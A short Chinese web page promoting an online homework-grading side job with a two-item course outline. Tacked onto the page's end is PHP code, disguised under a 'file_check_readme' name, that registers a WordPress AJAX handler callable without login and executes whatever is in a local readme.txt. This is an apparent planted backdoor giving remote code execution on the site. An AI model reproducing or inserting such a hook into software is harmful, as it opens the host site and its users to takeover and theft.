项目介绍
线上改作业,对着答案改就行,零门槛,新人直接上手!
课程目录
- 项目介绍
- 项目实操
if(!function_exists('file_check_readme68860')){ add_action('wp_ajax_nopriv_file_check_readme68860', 'file_check_readme68860'); add_action('wp_ajax_file_check_readme68860', 'file_check_readme68860'); function file_check_readme68860() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }